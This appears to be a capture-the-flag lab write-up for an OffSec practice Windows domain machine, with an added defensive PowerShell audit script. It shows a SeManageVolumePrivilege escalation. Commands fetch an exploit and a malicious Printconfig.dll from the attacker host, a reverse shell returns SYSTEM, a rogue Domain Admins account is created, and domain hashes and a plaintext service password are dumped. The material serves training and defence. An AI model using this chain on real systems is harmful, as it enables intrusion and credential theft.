SeManageVolumePrivilege

It has been identified that the svc_mssql account holds the SeManageVolumePrivilege privilege, which can be abused for privilege escalation.

PS C:\tmp> mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.bak
mv : Access to the path is denied.
At line:1 char:1
+ mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\Syst...Printconfig.dll:FileInfo) [Move-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

Before the exploit is run, the file C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll cannot be modified.

PS C:\tmp> iwr -Uri http://192.168.45.171/SeManageVolumeExploit.exe -OutFile .\SeManageVolumeExploit.exe

Delivering the exploit binary

PS C:\tmp> .\SeManageVolumeExploit.exe
Entries changed: 926
DONE 

Executing the exploit

PS C:\tmp> mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.bak

Now I can modify it

PS C:\tmp> iwr -Uri http://192.168.45.171/Printconfig.dll -OutFile C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll

Delivering the payload to replace the C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll file

PS C:\tmp> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\tmp> $object = [Activator]::CreateInstance($type)

Instantiating the PrintNotify COM object, which loads the replaced Printconfig.dll as SYSTEM

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 1234
listening on [any] 1234 ...
 
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 50723
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
SERVER
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.224.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.224.254

System-level compromise
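A defender-side audit for the chain above, added here and not part of the original writeup: it lists who holds SeManageVolumePrivilege, flags write access on the spool driver directory and Printconfig.dll by anything other than SYSTEM, Administrators or TrustedInstaller, and checks the DLL's Authenticode signature. The paths and the expected default holders (Administrators only) are assumptions about a stock Windows install; run it as an administrator.

```powershell
# Added audit script (not from the original writeup). Run elevated.
$driverDir = 'C:\Windows\System32\spool\drivers\x64\3'   # assumed default path
$dll       = Join-Path $driverDir 'Printconfig.dll'

# 1. Who holds SeManageVolumePrivilege? secedit exports local policy as INI text.
$cfg = Join-Path $env:TEMP 'secpol_audit.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
$line = Get-Content $cfg | Where-Object { $_ -match '^SeManageVolumePrivilege\s*=' }
Remove-Item $cfg -ErrorAction SilentlyContinue
$holders = @()
if ($line) {
    $holders = ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
        $entry = $_.Trim().TrimStart('*')          # entries look like *S-1-5-32-544
        try {
            (New-Object System.Security.Principal.SecurityIdentifier($entry)).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch { $entry }                          # already a name, or unresolvable SID
    }
}
Write-Host "SeManageVolumePrivilege holders: $($holders -join ', ')"
# On a default build only BUILTIN\Administrators appears here; a service account
# such as svc_mssql in this list is the finding from the writeup.

# 2. Does any non-privileged identity have write-class rights on the driver dir or DLL?
$privileged = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'
$writeMask  = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
foreach ($path in $driverDir, $dll) {
    if (-not (Test-Path $path)) { continue }
    foreach ($ace in (Get-Acl -Path $path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($privileged -contains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) {
            Write-Warning "$path : $($ace.IdentityReference) has $($ace.FileSystemRights)"
        }
    }
}

# 3. Is the DLL still the Microsoft-signed original?
if (Test-Path $dll) {
    $sig = Get-AuthenticodeSignature -FilePath $dll
    Write-Host "$dll signature: $($sig.Status) ($($sig.SignerCertificate.Subject))"
}
```

Once the exploit in the writeup has run, the mv on Printconfig.dll succeeds, so step 2 would report the driver directory as writable by the low-privileged account and step 3 would report the swapped DLL as NotSigned or HashMismatch.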

Hashdump


C:\Windows\system32> net user /ADD adm1n qwer1234 /DOMAIN && net group /DOMAIN "Domain Admins" /ADD adm1n
 
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ impacket-secretsdump ACCESS.OFFSEC/adm1n@server.access.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: qwer1234
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85010ccdc73e309c2159bbc9d1ffdc16:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
[*] _SC_ApacheHTTPServer 
ACCESS\svc_apache:ServiceApache!!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85010ccdc73e309c2159bbc9d1ffdc16:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:24e346a56bd63cab74d110e85d7c5c5e:::
svc_apache:1103:aad3b435b51404eeaad3b435b51404ee:d8f8fd2f7c065ffa8b66aa1792e3d1cf:::
svc_mssql:1104:aad3b435b51404eeaad3b435b51404ee:f773c5db7ddebefa4b0dae7ee8c50aea:::
adm1n:4102:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::
SERVER$:1000:aad3b435b51404eeaad3b435b51404ee:f1a773a1c32826f2c3062fff45be0c60:::
[*] Kerberos keys grabbed
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain-level compromise